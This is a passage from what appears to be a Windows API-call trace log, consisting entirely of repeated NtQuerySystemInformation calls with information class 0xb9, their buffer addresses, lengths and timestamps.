(SystemInformationClass=0xb9, SystemInformation=0xc7520fd360, Length=0x38, ResultLength=0x0) [0227.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x20, ResultLength=0x0) [0227.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x20, ResultLength=0x0) [0227.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x20, ResultLength=0x0) [0227.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x20, ResultLength=0x0) [0227.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.731] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd360, Length=0x38, ResultLength=0x0) [0227.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x20, ResultLength=0x0) [0227.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x20, ResultLength=0x0) [0227.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd170, Length=0x20, ResultLength=0x0) [0227.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.732] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd448, Length=0x58, ResultLength=0x0) [0227.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.733] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x38, ResultLength=0x0) [0227.734] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.735] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x28, ResultLength=0x0) [0227.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x28, ResultLength=0x0) [0227.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.737] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x28, ResultLength=0x0) [0227.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x28, ResultLength=0x0) [0227.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x28, ResultLength=0x0) [0227.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x38, ResultLength=0x0) [0227.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x38, ResultLength=0x0) [0227.738] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.739] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x28, ResultLength=0x0) [0227.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.741] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x28, ResultLength=0x0) [0227.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x38, ResultLength=0x0) [0227.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x38, ResultLength=0x0) [0227.742] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0c0, Length=0x20, ResultLength=0x0) [0227.743] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x20, ResultLength=0x0) [0227.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x20, ResultLength=0x0) [0227.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x20, ResultLength=0x0) [0227.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x20, ResultLength=0x0) [0227.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x38, ResultLength=0x0) [0227.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x20, ResultLength=0x0) [0227.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0227.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.744] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0227.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0227.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x38, ResultLength=0x0) [0227.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x20, ResultLength=0x0) [0227.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0227.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0227.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd130, Length=0x20, ResultLength=0x0) [0227.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd320, Length=0x38, ResultLength=0x0) [0227.745] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1b0, Length=0x20, ResultLength=0x0) [0227.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x20, ResultLength=0x0) [0227.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd140, Length=0x20, ResultLength=0x0) [0227.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd448, Length=0x58, ResultLength=0x0) [0227.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x58, ResultLength=0x0) [0227.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.746] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x38, ResultLength=0x0) [0227.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x28, ResultLength=0x0) [0227.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x28, ResultLength=0x0) [0227.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.748] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x28, ResultLength=0x0) [0227.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x28, ResultLength=0x0) [0227.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x28, ResultLength=0x0) [0227.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x38, ResultLength=0x0) [0227.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.749] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0227.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.751] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0227.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x38, ResultLength=0x0) [0227.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x20, ResultLength=0x0) [0227.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0227.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0227.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd030, Length=0x20, ResultLength=0x0) [0227.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.752] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x38, ResultLength=0x0) [0227.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x20, ResultLength=0x0) [0227.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x20, ResultLength=0x0) [0227.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x20, ResultLength=0x0) [0227.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x58, ResultLength=0x0) [0227.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.753] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x38, ResultLength=0x0) [0227.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x28, ResultLength=0x0) [0227.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x28, ResultLength=0x0) [0227.755] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x28, ResultLength=0x0) [0227.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x28, ResultLength=0x0) [0227.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x28, ResultLength=0x0) [0227.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x38, ResultLength=0x0) [0227.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.756] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0227.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.759] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0227.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcff0, Length=0x20, ResultLength=0x0) [0227.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf70, Length=0x20, ResultLength=0x0) [0227.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf70, Length=0x20, ResultLength=0x0) [0227.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf70, Length=0x20, ResultLength=0x0) [0227.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.760] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x38, ResultLength=0x0) [0227.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x38, ResultLength=0x0) [0227.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x20, ResultLength=0x0) [0227.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x20, ResultLength=0x0) [0227.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd040, Length=0x20, ResultLength=0x0) [0227.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.761] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd310, Length=0x58, ResultLength=0x0) [0227.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.762] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x38, ResultLength=0x0) [0227.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x28, ResultLength=0x0) [0227.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.763] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x28, ResultLength=0x0) [0227.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x28, ResultLength=0x0) [0227.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x28, ResultLength=0x0) [0227.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0d0, Length=0x28, ResultLength=0x0) [0227.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd230, Length=0x38, ResultLength=0x0) [0227.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.764] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd150, Length=0x28, ResultLength=0x0) [0227.767] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.767] NtQuerySystemInformation 